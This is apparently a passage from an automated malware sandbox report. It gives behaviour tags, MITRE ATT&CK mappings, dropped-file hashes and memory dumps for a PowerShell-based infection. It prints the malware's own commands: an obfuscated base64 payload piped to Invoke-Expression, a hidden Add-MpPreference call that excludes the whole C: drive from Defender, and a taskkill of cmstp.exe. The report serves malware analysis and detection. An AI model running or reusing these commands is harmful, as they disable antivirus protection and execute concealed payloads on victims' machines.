N0cnJhZnR1bHU9bHhzd3N3b3hkcmt3aHFlICh5em9oaWRpeG9tYXdhaGYgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZG5sYm1vY21td3JoeG9sYnl2cmd2dW1pdFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTthamVjYWl5eWR3bmZmdG5qdXhtdnB6cmNkICR6ZWdxdHFwb2d4a3dmYWZtdmtpZ3NxZmhuICRudWxsO2FqZWNhaXl5ZHduZmZ0bmp1eG12cHpyY2QgJHhjamluamJjaG5qd3ZzZ2N0cnJhZnR1bHUgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1ef85a547edc27c13271009c36d9a8de

SHA1
84197cd759db579e2e4bd7c03aa4de36b515c1fd

SHA256
c2c5895f3a9356b6be3feeeb3ce2878d498ab230370532189f1156a9f848a14d

SHA512
65cf5104560f49b9a6dba0d901db4529ef416202eed3fcf6b28be86f8fb4cddc931400be8d4723198750226123d2a711dba83166dbe4c507ffcbcf8f5ecbcb41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
215fa5932830c64a7049274a3716ba58

SHA1
19b3835fe5674c620bbac144e3b042fa89c54070

SHA256
7fcdd9641321e0b0fc76cab08a789125783bbe07d752ca14bc6184c4fd381986

SHA512
5a04070b08d0e459949190d8238684e0b2b8a5b7cad16041724e8913b6591944abfb535f849d17d0714c2f9a34910ac8147100978848061fd83600e4b9eb1803

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES91FF.tmp

Filesize
1KB

MD5
14aa4dee436090dd61c40a3cae2d3c91

SHA1
8df28dc780ff5215f0fc66bae4b10e66ca73b78f

SHA256
5b74e464bba7f73fa1918f856e11b16a0fb954ca2c9d8d899a3c58a86ad5bf11

SHA512
ea915be89e9ba80a6a610c64b34ed65abb13a0af9ae8734815a1dd0def4ba88089201f190f1d8daa260f30e508c6690ece45bba8c1b20efa2d9c672c3dab26c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t23tkt54.0j2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
269KB

MD5
953ca19c7ec317a9e61eb0b37e5fba45

SHA1
e5b07ef0f6a2a9ca0f9f26c622521861dc6cd786

SHA256
2c62df16384cc9b4ef023b57b151fe6711cd03306b7dd1929f773ae1dd77c49d

SHA512
fa7c7c8cb9318813de121c28121d8862d78763992276441265bf776041c2cb938f9e087f3ede559a7c096c14f31e2d41c2b72b86f48330efc36665a8f046d7de

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8B58.vbs

Filesize
275KB

MD5
8a6ef426368a7e273704a654aee6ee82

SHA1
285152199560e1970295e0a5f1eb1e017b2391af

SHA256
5d071dc05b819c190e333a894db3b16e96f8531b280618c776dfe0505452d2df

SHA512
2a94c18195a591947d934782d1f63b71184d4c389761b61703f3cd18e229f100c38858ddf7c275cb930a0f05dfe6d6dce90f2a9d1ea3ec643ac09483512f00aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsttqcvn\vsttqcvn.dll

Filesize
4KB

MD5
e509f509e214e173d925a78b2172d93a

SHA1
d15d664231d7bf068a02907ad0757e9e9b774a81

SHA256
d68feadb4b916da20fd93cd5ee8e0867dcef7dd80cbdad7d9c47dd341b3aee0e

SHA512
6a732f8dc41e5f190abbfc98534a23f68bfbdbe7d7e7ddc9381f812226127ed80a8db20f86b7898eb92e500b27459dca098c7739cbbfed2fef65dd4367d16292

Download Submit
C:\windows\temp\2h0ms45b.inf

Filesize
663B

MD5
27581dbbe3c3840ce72f99c21071898a

SHA1
898afeb9523df9367c74a01c0dbecf6b637f3cb1

SHA256
c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

SHA512
0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vsttqcvn\CSCE6FAF0AF9E8C4DC78038E78F2BB863.TMP

Filesize
652B

MD5
74e23471c9f09d352f2f624e682defaa

SHA1
31cef37ff45649772158270faf90e47eab686647

SHA256
64681c70eaf82fa0e6ec924a86b606a78e22275ac10a3bce04c68bcfcf9db085

SHA512
040c74873f5079153534629e70722c454ff3d1538d22da89777f7c704e842368bcbf33b022fa19408939077aa97eb852ec73e16aa68a126381d991379b91317b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vsttqcvn\vsttqcvn.0.cs

Filesize
2KB

MD5
b8106096972fb511e0cf8b99386ecf93

SHA1
3003ba3a3681ba16d124d5b2305e6cc59af79b44

SHA256
49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

SHA512
218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vsttqcvn\vsttqcvn.cmdline

Filesize
369B

MD5
571e9d25ca57cbdc20f7237d1652feca

SHA1
f381e4099413c2f7acc314fa1efb3c7093b1a979

SHA256
26d7c7f1867bfdfe4376994b002fccb7b2eb9ff6d69fbe6a894786930f89130a

SHA512
133dc213c355cb436b437c1631b56445963d17dee5687039d9b367a6c529d487e2e8da2ee3950273735ac106cec32636670628fbf0b01e34a90bbbdaf845811a

Download Submit
memory/1828-80-0x0000000006300000-0x0000000006654000-memory.dmp

Filesize
3.3MB

Download
memory/1828-88-0x0000000070970000-0x0000000070CC4000-memory.dmp

Filesize
3.3MB

Download
memory/1828-118-0x00000000080F0000-0x00000000080FA000-memory.dmp

Filesize
40KB

Download
memory/1828-116-0x00000000094E0000-0x000000000951C000-memory.dmp

Filesize
240KB

Download
memory/1828-115-0x0000000009480000-0x0000000009492000-memory.dmp

Filesize
72KB

Download
memory/1828-114-0x0000000008980000-0x0000000008A12000-memory.dmp

Filesize
584KB

Download
memory/1828-113-0x0000000008880000-0x00000000088DE000-memory.dmp

Filesize
376KB

Download
memory/1828-66-0x0000000003470000-0x00000000034A6000-memory.dmp

Filesize
216KB

Download
memory/1828-67-0x0000000005B00000-0x0000000006128000-memory.dmp

Filesize
6.2MB

Download
memory/1828-68-0x0000000005A40000-0x0000000005A62000-memory.dmp

Filesize
136KB

Download
memory/1828-69-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/1828-70-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/1828-110-0x0000000008E30000-0x00000000093D4000-memory.dmp

Filesize
5.6MB

Download
memory/1828-82-0x0000000006810000-0x000000000682E000-memory.dmp

Filesize
120KB

Download
memory/1828-83-0x00000000068C0000-0x000000000690C000-memory.dmp

Filesize
304KB

Download
memory/1828-84-0x0000000008160000-0x00000000087DA000-memory.dmp

Filesize
6.5MB

Download
memory/1828-85-0x0000000006D10000-0x0000000006D2A000-memory.dmp

Filesize
104KB

Download
memory/1828-86-0x0000000007EE0000-0x0000000007F12000-memory.dmp

Filesize
200KB

Download
memory/1828-87-0x00000000707C0000-0x000000007080C000-memory.dmp

Filesize
304KB

Download
memory/1828-109-0x0000000007F20000-0x0000000007F54000-memory.dmp

Filesize
208KB

Download
memory/1828-98-0x0000000007F20000-0x0000000007F3E000-memory.dmp

Filesize
120KB

Download
memory/1828-99-0x0000000007F50000-0x0000000007FF3000-memory.dmp

Filesize
652KB

Download
memory/1828-100-0x0000000008050000-0x000000000805A000-memory.dmp

Filesize
40KB

Download
memory/1828-101-0x00000000087E0000-0x0000000008876000-memory.dmp

Filesize
600KB

Download
memory/1828-102-0x0000000008060000-0x0000000008071000-memory.dmp

Filesize
68KB

Download
memory/1828-103-0x0000000008090000-0x000000000809E000-memory.dmp

Filesize
56KB

Download
memory/1828-104-0x00000000080B0000-0x00000000080C4000-memory.dmp

Filesize
80KB

Download
memory/1828-105-0x00000000080F0000-0x000000000810A000-memory.dmp

Filesize
104KB

Download
memory/1828-106-0x00000000080E0000-0x00000000080E8000-memory.dmp

Filesize
32KB

Download
memory/1828-108-0x00000000057B0000-0x00000000057B8000-memory.dmp

Filesize
32KB

Download
memory/2368-44-0x000001A1470F0000-0x000001A1470F8000-memory.dmp

Filesize
32KB

Download
memory/2368-28-0x000001A1470D0000-0x000001A1470EC000-memory.dmp

Filesize
112KB

Download
memory/4948-0-0x00007FFD8C223000-0x00007FFD8C225000-memory.dmp

Filesize
8KB

Download
memory/4948-10-0x0000013979640000-0x0000013979662000-memory.dmp

Filesize
136KB

Download
memory/4948-11-0x00007FFD8C220000-0x00007FFD8CCE1000-memory.dmp

Filesize
10.8MB

Download
memory/4948-12-0x00007FFD8C220000-0x00007FFD8CCE1000-memory.dmp

Filesize
10.8MB

Download
memory/4948-36-0x00007FFD8C220000-0x00007FFD8CCE1000-memory.dmp

Filesize
10.8MB

Download